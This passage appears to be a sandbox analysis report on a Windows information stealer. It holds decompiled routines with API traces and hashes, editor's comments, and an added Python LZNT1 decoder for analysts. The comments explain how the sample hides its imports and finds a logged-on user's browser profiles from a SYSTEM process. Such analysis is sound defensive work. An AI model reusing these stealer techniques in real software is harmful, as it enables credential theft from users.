                                                                                    • Sleep.KERNEL32(00000096), ref: 04EB208D
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB20A9
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EB20CE
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB20D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                                                    • String ID: |
                                                                                    • API String ID: 1906678132-2343686810
                                                                                    • Opcode ID: 856cf4f62ae6ee2e630af32be800aaf22e2d2d21a40d3ee57a7f694ae52fca23
                                                                                    • Instruction ID: 512b803e87fe885df94db05004cd9dae6e7f1b33247fdeccf3cbf1d607ba3e8c
                                                                                    • Opcode Fuzzy Hash: 856cf4f62ae6ee2e630af32be800aaf22e2d2d21a40d3ee57a7f694ae52fca23
                                                                                    • Instruction Fuzzy Hash: D321A471A40304BFFB119FA49C86BAA7FA4EF04714F10519AFA14AE2C5DAB5B940CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
			/*
			 * Editor's notes on this decompiled routine (the sample's code, not ours):
			 * it builds a compression context whose three Rtl* routines are resolved
			 * from ntdll with GetProcAddress at run time, so they never show up in the
			 * import table. The WORD at +0x18 is the CompressionFormatAndEngine value
			 * passed to RtlGetCompressionWorkSpaceSize; 2 is COMPRESSION_FORMAT_LZNT1.
			 * Object layout at __ecx: +0x00 ready flag, +0x04/+0x08/+0x0c the three
			 * function pointers, +0x10 compress-workspace size, +0x14 fragment-workspace
			 * size, +0x18 format/engine, +0x1c workspace buffer. Statement lines carry
			 * the address they were lifted from as "@ 0x....".
			 */
			E04EB7970(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t21;
				intOrPtr _t22;
				struct HINSTANCE__* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t25 = __ecx;                                                          // @ 0x04eb7970
				_t27 = __ecx;                                                          // @ 0x04eb7972
				_t1 = _t27 + 0x10; // 0x10                                             // @ 0x04eb797a
				_t26 = _t1;                                                            // @ 0x04eb797a   &compress-workspace size
				 *_t26 = 0;                                                            // @ 0x04eb797d
				 *__ecx = 0;                                                           // @ 0x04eb7988   not ready yet
				 *((intOrPtr*)(__ecx + 0x14)) = 0;                                     // @ 0x04eb798e
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;                                     // @ 0x04eb7995
				 *((short*)(__ecx + 0x18)) = 2;                                        // @ 0x04eb799c   COMPRESSION_FORMAT_LZNT1
				_t24 = LoadLibraryA("ntdll.dll");                                      // @ 0x04eb79a6
				if(_t24 != 0) {                                                        // @ 0x04eb79aa
					_t15 = GetProcAddress(_t24, "RtlGetCompressionWorkSpaceSize");    // @ 0x04eb79b2
					 *(_t27 + 4) = _t15;                                               // @ 0x04eb79b8
					if(_t15 != 0) {                                                    // @ 0x04eb79bd
						_t16 = GetProcAddress(_t24, "RtlCompressBuffer");              // @ 0x04eb79c5
						 *(_t27 + 8) = _t16;                                           // @ 0x04eb79cb
						if(_t16 != 0) {                                                // @ 0x04eb79d0
							_t17 = GetProcAddress(_t24, "RtlDecompressBuffer");        // @ 0x04eb79d8
							 *(_t27 + 0xc) = _t17;                                     // @ 0x04eb79de
							if(_t17 != 0) {                                            // @ 0x04eb79e3
								_t8 = _t27 + 0x14; // 0x14                             // @ 0x04eb79e5   &fragment-workspace size
								/* RtlGetCompressionWorkSpaceSize(format, &CompressBufferWorkSpaceSize, &CompressFragmentWorkSpaceSize); 0 is STATUS_SUCCESS */
								_t21 =  *( *(_t27 + 4))( *(_t27 + 0x18) & 0x0000ffff, _t26, _t8);   // @ 0x04eb79f2
								_t35 = _t21;                                           // @ 0x04eb79f4
								if(_t21 == 0) {                                        // @ 0x04eb79f6
									_push( *_t26);                                     // @ 0x04eb79f8   workspace size
									_t22 = E04ED5785(_t25, _t27, _t35);                // @ 0x04eb79fa   allocator: size pushed, result null-checked below
									 *((intOrPtr*)(_t27 + 0x1c)) = _t22;               // @ 0x04eb7a02
									if(_t22 != 0) {                                    // @ 0x04eb7a07
										E04EDDAD0(_t26, _t22, 0,  *_t26);              // @ 0x04eb7a0e   memset-style zero fill of the workspace
										 *_t27 = 1;                                    // @ 0x04eb7a16   context ready
									}
								}
							}
						}
					}
				}
				return _t27;                                                           // @ 0x04eb7a21
			}

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                                                    • API String ID: 2238633743-2202537490
                                                                                    • Opcode ID: 7bbe9a94a8b33e43a46bb5f82c17678fef45bf85559e0c5cdf7289b1a7e2b8fa
                                                                                    • Instruction ID: 8f3e8a859723487f2c5bb959d6853ba762d2d8abf80813fa9b55fb181160c1c0
                                                                                    • Opcode Fuzzy Hash: 7bbe9a94a8b33e43a46bb5f82c17678fef45bf85559e0c5cdf7289b1a7e2b8fa
                                                                                    • Instruction Fuzzy Hash: B31182B41007029BE7309F66DC44B53BBE8AF44705F105D29E982D2A81EB74F5088B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
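The routine above selects engine 2, which is COMPRESSION_FORMAT_LZNT1. What follows is an added example written for this page, not code from the sample, from the sandbox or from any library: a pure-Python LZNT1 compressor and decompressor following MS-XCA, so an analyst can unpack buffers the sample produced with RtlCompressBuffer (dumped from memory or captured on the wire) without loading ntdll. The cookie-like SAMPLE bytes and the HAND_BUILT stream are constructed for the example, and the function names are the example's own.

```python
import struct

CHUNK = 4096          # uncompressed bytes per LZNT1 chunk
SIGNATURE = 3 << 12   # bits 12-14 of every chunk header
COMPRESSED = 0x8000   # bit 15 set: body is tokenised; clear: stored raw

def token_split(out_pos):
    # A back-reference is a 16-bit LE token: 12 length bits and 4 displacement
    # bits for the first 16 decoded bytes, then one bit moves to the
    # displacement each time the position doubles (4/12 past 2048 bytes).
    length_mask, disp_shift = 0xFFF, 12
    p = out_pos - 1
    while p >= 0x10:
        length_mask >>= 1
        disp_shift -= 1
        p >>= 1
    return length_mask, disp_shift

def decompress_chunk(src):
    """Expand one tokenised chunk body (header already stripped)."""
    out, i = bytearray(), 0
    while i < len(src):
        flags, i = src[i], i + 1          # one flag bit per element, LSB first
        for bit in range(8):
            if i >= len(src):
                break
            if not (flags >> bit) & 1:    # clear bit: literal byte
                out.append(src[i]); i += 1
                continue
            token, i = struct.unpack_from("<H", src, i)[0], i + 2
            length_mask, disp_shift = token_split(len(out))
            length, disp = (token & length_mask) + 3, (token >> disp_shift) + 1
            if disp > len(out):
                raise ValueError("back-reference before start of chunk")
            for _ in range(length):       # byte-wise, so overlapping runs work
                out.append(out[-disp])
    return bytes(out)

def lznt1_decompress(data):
    """What RtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1, ...) computes."""
    out, i = bytearray(), 0
    while i + 2 <= len(data):
        header, i = struct.unpack_from("<H", data, i)[0], i + 2
        if header == 0:                   # zero header ends the stream
            break
        if (header & 0x7000) != SIGNATURE:
            raise ValueError("bad LZNT1 chunk header at offset %d" % (i - 2))
        size = (header & 0xFFF) + 1       # body length; the field holds size-1
        body, i = data[i:i + size], i + size
        out += decompress_chunk(body) if header & COMPRESSED else body
    return bytes(out)

def compress_chunk(raw):
    """Greedy LZ77 matcher emitting LZNT1 tokens for one chunk (<= 4096 B)."""
    out, pos = bytearray(), 0
    while pos < len(raw):
        flags, flag_index = 0, len(out)
        out.append(0)                     # flags byte, patched after the group
        for bit in range(8):
            if pos >= len(raw):
                break
            length_mask, disp_shift = token_split(pos)
            max_len, max_disp = length_mask + 3, (0xFFFF >> disp_shift) + 1
            best_len = best_disp = 0
            for disp in range(1, min(pos, max_disp) + 1):
                n = 0
                while (n < max_len and pos + n < len(raw)
                       and raw[pos + n] == raw[pos + n - disp]):
                    n += 1
                if n > best_len:
                    best_len, best_disp = n, disp
            if best_len >= 3:
                out += struct.pack("<H", ((best_disp - 1) << disp_shift) | (best_len - 3))
                flags |= 1 << bit
                pos += best_len
            else:
                out.append(raw[pos]); pos += 1
        out[flag_index] = flags
    return bytes(out)

def lznt1_compress(data):
    """What RtlCompressBuffer(COMPRESSION_FORMAT_LZNT1, ...) produces."""
    out = bytearray()
    for start in range(0, len(data), CHUNK):
        raw = data[start:start + CHUNK]
        packed = compress_chunk(raw)
        if len(packed) < len(raw):
            body, flag = packed, COMPRESSED
        else:
            body, flag = raw, 0           # incompressible chunk is stored raw
        out += struct.pack("<H", flag | SIGNATURE | (len(body) - 1)) + body
    return bytes(out)

# Constructed inputs, not taken from the sample. SAMPLE imitates staged cookie
# lines and spans two chunks. HAND_BUILT was assembled by hand from the spec:
# header 0xB005 (compressed, signature 3, 6-byte body), flags 0x08, literals
# "ABC", then token 0x2003 = displacement 3, length 6, giving "ABCABCABC".
SAMPLE = (b".example.com\tTRUE\t/\tTRUE\t0\tsid\tabc123\n"
          b"login.example.net\tFALSE\t/\tTRUE\t0\ttoken\txyz789\n") * 55
HAND_BUILT = bytes.fromhex("05b0 08 41 42 43 03 20")
```

The detail most ad-hoc decoders get wrong is that the split between length and displacement bits depends on how much of the current chunk has already been decoded; token_split is the one place that encodes it, and both directions share it. The format also allows a chunk to be stored raw, which is what lznt1_compress does when tokenising would not shrink it.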

                                                                                    C-Code - Quality: 68%
			/*
			 * Editor's notes on this decompiled routine (the sample's code, not ours):
			 * it fills the buffer at __ecx with the profile directory of the user whose
			 * data is to be harvested. E04ECA980 (per its API trace: AllocateAndInitializeSid
			 * with a single sub-authority 0x12 = SECURITY_LOCAL_SYSTEM_RID, then
			 * CheckTokenMembership and FreeSid; the identifier authority is not visible)
			 * tests whether the current token is LocalSystem, and a result of 2 is treated
			 * here as "running as SYSTEM". In that case USERPROFILE would name the SYSTEM
			 * profile, so the code takes a session id from E04EC70A0, calls WTSQueryUserToken
			 * (resolved at run time from Wtsapi32) for that session's user token and hands
			 * it to GetUserProfileDirectoryW; otherwise it simply reads USERPROFILE. This is
			 * how a payload running inside a SYSTEM service process (the signatures above
			 * flag injection into svchost) locates the logged-on user's browser profiles.
			 * The result of GetUserProfileDirectoryW is never checked; the caller only sees
			 * the non-zero WTSQueryUserToken result. Statement lines carry the address they
			 * were lifted from as "@ 0x....".
			 */
			E04EC7200(WCHAR* __ecx, long* __edx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				void* _t13;
				WCHAR* _t16;
				intOrPtr* _t21;
				void* _t22;

				_t21 = __edx;                                                           // @ 0x04ec7209   in/out: buffer size in WCHARs
				_t16 = __ecx;                                                           // @ 0x04ec720b   output buffer
				_t22 = 0;                                                               // @ 0x04ec720d
				if(E04ECA980() != 2) {                                                  // @ 0x04ec7217   not LocalSystem
					 *_t21 = GetEnvironmentVariableW(L"USERPROFILE", _t16,  *__edx);    // @ 0x04ec727f
					_t22 = ( *_t21 != 0) ? 1 : 0;                                       // @ 0x04ec7286   operands lost by the decompiler; reads as "did GetEnvironmentVariableW return non-zero"
					goto L6;                                                            // @ 0x00000000
				} else {                                                                // @ 0x04ec7219
					_v12 = E04EC70A0(_t16, __edx, 0);                                   // @ 0x04ec7223   session id for WTSQueryUserToken
					_v8 = 0;                                                            // @ 0x04ec7226   hToken
					_t11 = LoadLibraryA("Wtsapi32.dll");                                // @ 0x04ec7229
					if(_t11 == 0) {                                                     // @ 0x04ec7231
						L6:                                                             // @ 0x04ec728a
						return _t22;                                                    // @ 0x04ec7291
					} else {                                                            // @ 0x04ec7233
						_t12 = GetProcAddress(_t11, "WTSQueryUserToken");               // @ 0x04ec7239
						if(_t12 == 0) {                                                 // @ 0x04ec7241
							goto L6;                                                    // @ 0x00000000
						} else {                                                        // @ 0x04ec7243
							_t13 =  *_t12(_v12,  &_v8);                                 // @ 0x04ec724a   WTSQueryUserToken(SessionId, &hToken)
							if(_t13 == 0) {                                             // @ 0x04ec724e
								goto L6;                                                // @ 0x00000000
							} else {                                                    // @ 0x04ec7250
								__imp__GetUserProfileDirectoryW(_v8, _t16, _t21);       // @ 0x04ec7255   (hToken, lpProfileDir, lpcchSize); return value ignored
								CloseHandle(_v8);                                       // @ 0x04ec7260
								return _t13;                                            // @ 0x04ec726e
							}
						}
					}
				}
			}

                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                    • GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000104,?,?,?,04EB68A1), ref: 04EC7277
                                                                                      • Part of subcall function 04EC70A0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 04EC70DD
                                                                                      • Part of subcall function 04EC70A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04EC70F5
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                    • GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$AddressAllocateCheckCloseDirectoryEnvironmentFreeHandleInitializeMembershipProcProfileTokenUserVariableVersion
                                                                                    • String ID: USERPROFILE$WTSQueryUserToken$Wtsapi32.dll
                                                                                    • API String ID: 360731618-4029724716
                                                                                    • Opcode ID: 3ef1439d3209bbae159e87d184bcfe717243bfd88f30f356109d9b76e263d36b
                                                                                    • Instruction ID: f4d270bf273a35b117fe5798c5c5f412f853d43be9be6d6490343887b36e226b
                                                                                    • Opcode Fuzzy Hash: 3ef1439d3209bbae159e87d184bcfe717243bfd88f30f356109d9b76e263d36b
                                                                                    • Instruction Fuzzy Hash: DF01FE72B00206AF9B149FFA9D0596EFBBCDF84656B100169FD08D2210EB31ED119F90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04ECBCE0() {
                                                                                    				long _t1;
                                                                                    				void* _t9;
                                                                                    				void* _t13;
                                                                                    				void* _t14;
                                                                                    
                                                                                    				_t9 = WaitForSingleObject;
                                                                                    				_t14 = Sleep;
                                                                                    				L1:
                                                                                    				_t10 = L"Dispatch";
                                                                                    				_t1 = E04EC94A0(_t9, L"Dispatch", _t13, _t14, _t15);
                                                                                    				_t15 = _t1;
                                                                                    				if(_t1 != 0) {
                                                                                    					__eflags = _t1 - 0x2fffffff;
                                                                                    					if(__eflags != 0) {
                                                                                    						_t13 = OpenThread(0x1fffff, 0, _t1);
                                                                                    						__eflags = _t13;
                                                                                    						if(__eflags != 0) {
                                                                                    							WaitForSingleObject(_t13, 0xffffffff);
                                                                                    							CloseHandle(_t13);
                                                                                    						}
                                                                                    						E04ECBC60(_t10, _t14, __eflags);
                                                                                    						Sleep(0x3e8);
                                                                                    					} else {
                                                                                    						Sleep(0x7d0);
                                                                                    						E04EB78A0(_t9, L"Dispatch", 0, _t13, _t14, __eflags);
                                                                                    						E04ECBC60(L"Dispatch", _t14, __eflags);
                                                                                    						Sleep(0x3e8);
                                                                                    					}
                                                                                    				} else {
                                                                                    					E04ECBC60(L"Dispatch", _t14, _t15);
                                                                                    					Sleep(0x3e8);
                                                                                    				}
                                                                                    				goto L1;
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC94E0
                                                                                      • Part of subcall function 04EC94A0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC951D
                                                                                      • Part of subcall function 04EC94A0: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?), ref: 04EC954C
                                                                                      • Part of subcall function 04EC94A0: RegCloseKey.ADVAPI32(?), ref: 04EC9562
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC959B
                                                                                      • Part of subcall function 04EC94A0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 04EC95B2
                                                                                      • Part of subcall function 04EC94A0: CloseHandle.KERNEL32(00000000), ref: 04EC95BD
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECBD08
                                                                                    • Sleep.KERNEL32(000007D0), ref: 04ECBD18
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECBD30
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04ECBD3C
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04ECBD4B
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECBD4E
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECBD5E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep$CloseOpen$Handlewsprintf$EventObjectQuerySingleThreadValueWait
                                                                                    • String ID: Dispatch
                                                                                    • API String ID: 3560866944-2137261068
                                                                                    • Opcode ID: b9e3694fd6cbb1d3f94098f38e8481a1c2b78a6a0b2fad3de849791368d87de6
                                                                                    • Instruction ID: 0e0bc1405823805df9a36ea5d48d3cc16b66b5b66a77c5961e33c142ccdab872
                                                                                    • Opcode Fuzzy Hash: b9e3694fd6cbb1d3f94098f38e8481a1c2b78a6a0b2fad3de849791368d87de6
                                                                                    • Instruction Fuzzy Hash: 98F0F034A44218AAF30127766EC6F3E162E8FC5B2DF10235CAA34B61D09D5478020672
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 52%
                                                                                    			E04ED3000(void* __ebx, int __ecx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				long _v16;
                                                                                    				int _v20;
                                                                                    				struct _OVERLAPPED* _v24;
                                                                                    				long _v28;
                                                                                    				long _v32;
                                                                                    				signed int _v36;
                                                                                    				signed int _t51;
                                                                                    				signed int _t58;
                                                                                    				int _t65;
                                                                                    				DWORD* _t71;
                                                                                    				void* _t72;
                                                                                    				long _t73;
                                                                                    				signed int _t84;
                                                                                    				HANDLE* _t85;
                                                                                    				int _t86;
                                                                                    				signed int _t91;
                                                                                    				signed int _t97;
                                                                                    				long _t100;
                                                                                    				intOrPtr* _t101;
                                                                                    				signed int _t102;
                                                                                    				int _t104;
                                                                                    				struct _OVERLAPPED* _t106;
                                                                                    				signed int _t108;
                                                                                    				signed int _t109;
                                                                                    				signed int _t111;
                                                                                    
                                                                                    				_t51 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t51 ^ _t109;
                                                                                    				_t104 = __ecx;
                                                                                    				_v20 = __ecx;
                                                                                    				_t84 =  *((intOrPtr*)(__ecx + 0x7c)) -  *((intOrPtr*)(__ecx + 0x78)) >> 2;
                                                                                    				_v16 = _t84;
                                                                                    				if(_t84 > 0) {
                                                                                    					_t102 = _t84;
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					do {
                                                                                    						PostQueuedCompletionStatus( *(__ecx + 0x50), 0, 0, 0);
                                                                                    						_t102 = _t102 - 1;
                                                                                    					} while (_t102 != 0);
                                                                                    				}
                                                                                    				_v12 = 0;
                                                                                    				if(_t84 <= 0) {
                                                                                    					L13:
                                                                                    					 *((intOrPtr*)(_t104 + 0x7c)) =  *((intOrPtr*)(_t104 + 0x78));
                                                                                    					return E04ED572E(_v8 ^ _t109);
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_t100 =  <  ? _t84 : 0x40;
                                                                                    						E04EF1480();
                                                                                    						_t91 = 0;
                                                                                    						_t85 = _t111;
                                                                                    						if(0x40 > 0) {
                                                                                    							_t97 = _v12 << 2;
                                                                                    							do {
                                                                                    								_t97 = _t97 + 4;
                                                                                    								_t85[_t91] =  *(_t97 +  *((intOrPtr*)(_t104 + 0x78)) - 4);
                                                                                    								_t91 = _t91 + 1;
                                                                                    							} while (_t91 < 0x40);
                                                                                    						}
                                                                                    						if(WaitForMultipleObjects(_t100, _t85, 1, 0xffffffff) != 0) {
                                                                                    							E04EB7AB0();
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							_t110 = _t111;
                                                                                    							_t58 =  *0x4f03008; // 0x3d21fb31
                                                                                    							_v36 = _t58 ^ _t111;
                                                                                    							_t101 = _v24;
                                                                                    							 *((intOrPtr*)( *_t101 + 0x128))(GetCurrentThreadId(), _t100, _t104, _t85, _t109, 0x80004005);
                                                                                    							while(1) {
                                                                                    								_t86 = 0;
                                                                                    								_t65 = GetQueuedCompletionStatus( *(_t101 + 0x50),  &_v16,  &_v28,  &_v24, 0xffffffff);
                                                                                    								_t106 = _v24;
                                                                                    								_v20 = _t65;
                                                                                    								if(_t106 != 0) {
                                                                                    									goto L20;
                                                                                    								}
                                                                                    								L17:
                                                                                    								_t72 = E04ED31E0(0, _t101, _t101, _v16, _v28);
                                                                                    								if(_t72 == 1) {
                                                                                    									while(1) {
                                                                                    										_t86 = 0;
                                                                                    										_t65 = GetQueuedCompletionStatus( *(_t101 + 0x50),  &_v16,  &_v28,  &_v24, 0xffffffff);
                                                                                    										_t106 = _v24;
                                                                                    										_v20 = _t65;
                                                                                    										if(_t106 != 0) {
                                                                                    											goto L20;
                                                                                    										}
                                                                                    										goto L17;
                                                                                    									}
                                                                                    									goto L20;
                                                                                    								}
                                                                                    								if(_t72 != 2) {
                                                                                    									_t106 = _v24;
                                                                                    									_t65 = _v20;
                                                                                    									goto L20;
                                                                                    								}
                                                                                    								_t73 = GetCurrentThreadId();
                                                                                    								 *((intOrPtr*)( *_t101 + 0x12c))();
                                                                                    								return E04ED572E(_v12 ^ _t110, _t73);
                                                                                    								goto L27;
                                                                                    								L20:
                                                                                    								if(_t65 == 0) {
                                                                                    									_v20 = _t86;
                                                                                    									_v32 = GetLastError();
                                                                                    									if( *((intOrPtr*)( *_t101 + 0x2c))() == 0) {
                                                                                    										_t86 = _v32;
                                                                                    									} else {
                                                                                    										_t71 =  &_v16;
                                                                                    										__imp__WSAGetOverlappedResult( *((intOrPtr*)(_t106 + 0x34)), _t106, _t71, 0,  &_v20);
                                                                                    										if(_t71 == 0) {
                                                                                    											__imp__#111();
                                                                                    											_t86 = _t71;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								E04ED32C0(_t101, _t101, _v28, _t106, _v16, _t86);
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t108 = 0;
                                                                                    							if(_t100 > 0) {
                                                                                    								do {
                                                                                    									CloseHandle(_t85[_t108]);
                                                                                    									_t108 = _t108 + 1;
                                                                                    								} while (_t108 < _t100);
                                                                                    							}
                                                                                    							goto L12;
                                                                                    						}
                                                                                    						goto L27;
                                                                                    						L12:
                                                                                    						_v12 = _v12 + _t100;
                                                                                    						_t84 = _v16 - _t100;
                                                                                    						_t104 = _v20;
                                                                                    						_v16 = _t84;
                                                                                    					} while (_t84 > 0);
                                                                                    					goto L13;
                                                                                    				}
                                                                                    				L27:
                                                                                    			}
                                                                                    0x04ed3195
                                                                                    0x04ed3173
                                                                                    0x04ed3179
                                                                                    0x04ed3181
                                                                                    0x04ed3189
                                                                                    0x04ed318b
                                                                                    0x04ed3191
                                                                                    0x04ed3191
                                                                                    0x04ed3189
                                                                                    0x04ed3171
                                                                                    0x04ed31a3
                                                                                    0x04ed31a3
                                                                                    0x04ed3096
                                                                                    0x04ed3096
                                                                                    0x04ed309a
                                                                                    0x04ed30a0
                                                                                    0x04ed30a3
                                                                                    0x04ed30a9
                                                                                    0x04ed30aa
                                                                                    0x04ed30a0
                                                                                    0x00000000
                                                                                    0x04ed309a
                                                                                    0x00000000
                                                                                    0x04ed30ae
                                                                                    0x04ed30b1
                                                                                    0x04ed30b4
                                                                                    0x04ed30b6
                                                                                    0x04ed30b9
                                                                                    0x04ed30bc
                                                                                    0x00000000
                                                                                    0x04ed3050
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 04ED3039
                                                                                    • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 04ED308C
                                                                                    • CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04ED30A3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ED3108
                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 04ED312A
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04ED315F
                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 04ED3181
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00000000), ref: 04ED318B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ED31AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CompletionCurrentErrorLastQueuedStatusThread$CloseHandleMultipleObjectsOverlappedPostResultWait
                                                                                    • String ID:
                                                                                    • API String ID: 1776276126-0
                                                                                    • Opcode ID: 688b83fdd94ad86ba597118d81773c26e6afefa73a94f9a629b45cff37d83ee6
                                                                                    • Instruction ID: 30de567a0b8bf8dea4b4e00b0c0cfec770a558df084f057365e6bd02d8187835
                                                                                    • Opcode Fuzzy Hash: 688b83fdd94ad86ba597118d81773c26e6afefa73a94f9a629b45cff37d83ee6
                                                                                    • Instruction Fuzzy Hash: AA51A275A00209AFDB109FA9C884ABEFBB9FF88315F104669EE15A7250DB31AD01CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E04EB50B0(void* __ecx, LONG* _a4) {
                                                                                    				signed int _v8;
                                                                                    				long _v12;
                                                                                    				long _v16;
                                                                                    				struct _OVERLAPPED* _v20;
                                                                                    				long _v24;
                                                                                    				struct _OVERLAPPED* _v32;
                                                                                    				WCHAR* _t38;
                                                                                    				void* _t39;
                                                                                    				signed int _t41;
                                                                                    				signed int _t44;
                                                                                    				long _t45;
                                                                                    				long _t46;
                                                                                    				void* _t48;
                                                                                    				long _t55;
                                                                                    				signed int _t59;
                                                                                    				void* _t64;
                                                                                    				LONG* _t69;
                                                                                    				void* _t73;
                                                                                    				LONG* _t74;
                                                                                    				long _t76;
                                                                                    				void* _t77;
                                                                                    
                                                                                    				_t65 = __ecx;
                                                                                    				_t74 = _a4;
                                                                                    				_t73 = __ecx;
                                                                                    				_v20 = 0;
                                                                                    				if( *((intOrPtr*)(_t74 + 4)) == 0xffffffff) {
                                                                                    					L12:
                                                                                    					E04EB5220(_t65);
                                                                                    					__eflags = 0;
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					_t38 = __ecx + 0x18;
                                                                                    					if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                                                    						_t38 =  *_t38;
                                                                                    					}
                                                                                    					_t39 = CreateFileW(_t38, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                    					_t64 = _t39;
                                                                                    					if(_t64 != 0xffffffff) {
                                                                                    						_v12 = 0;
                                                                                    						_t41 = GetFileSize(_t64,  &_v12);
                                                                                    						_v24 =  *((intOrPtr*)(_t74 + 4));
                                                                                    						_v8 = 0;
                                                                                    						_v8 = _v8 | _t41;
                                                                                    						asm("sbb esi, edx");
                                                                                    						_t44 = _v8 -  *((intOrPtr*)(_t74 + 4)) + 9;
                                                                                    						__eflags = _t44;
                                                                                    						_v8 = _t44;
                                                                                    						asm("adc esi, 0x0");
                                                                                    						if(__eflags < 0) {
                                                                                    							L9:
                                                                                    							_t76 = _v8;
